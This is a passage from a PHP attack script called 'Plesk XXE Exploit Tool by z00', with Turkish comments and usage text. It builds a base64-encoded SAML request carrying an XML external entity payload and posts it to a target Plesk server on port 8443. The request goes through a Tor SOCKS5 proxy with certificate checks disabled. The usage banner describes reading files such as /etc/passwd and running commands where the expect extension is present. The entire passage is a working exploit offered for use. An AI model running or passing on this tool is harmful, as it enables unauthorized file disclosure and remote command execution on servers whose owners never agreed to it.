] > &xxe; &xxe; 5BWiyX9zvACGR5y+NB2wxuXJtJE=S4LhCUOB0ylT4cjXUVAbnvrBjBBzybaxvWHTGw9JnRsyUB1MetRK+VHvV/M3Q4NX0DGUNFXlCZR3sM2msQOAhbjZxkKQCNUBig56/03pgsXlpWJFhnBL8m0sRRZBduf4QdHn/hxxyvAKzadPQ5nmIPmCPpO1CQsRUTMrt/13VIE= "; $exploit = urlencode(base64_encode($paket)); $relaystate = gethostbyname($domain); $relayadres = urlencode(base64_encode($relaystate)); $postlar = "SAMLRequest=$exploit&response_url=http://hax&RelayState=$relayadres&RefererScheme=https&RefererHost=https://$domain:8443&RefererPort=8443"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,$adres); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13'); curl_setopt($ch, CURLOPT_REFERER,$adres); curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0); //Proxy curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:9050"); curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5); //Proxy end curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_POSTFIELDS,$postlar ); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $sonuc = curl_exec ($ch); curl_close ($ch); $gelenpaket = //"Paket: " . $postlar . "Gonderilen Paket Boyutu: " . strlen($exploit)."\nRelayAdres: $relaystate\nSonuc: \r\n\r\n$sonuc \n"; return $gelenpaket; } if($argc < 4){ $kullanim = "########################################################################\n"; $kullanim .= "Plesk XXE Exploit Tool by z00\n"; $kullanim .= "Kullanimi : php $argv[0].php domain /etc/passwd read \n"; $kullanim .= "Example : php $argv[0].php adres cmd (only expect installed) method \n"; $kullanim .= "Kullanilabilir Methodlar : \ncmd (Expect kurulu ise)\nread (Dosya okur) \n"; $kullanim .= "########################################################################\r\n"; echo $kullanim; } else { $domain = $argv[1]; $komut = $argv[2]; $method = $argv[3]; echo Gonder($domain,$komut,$method); } ?>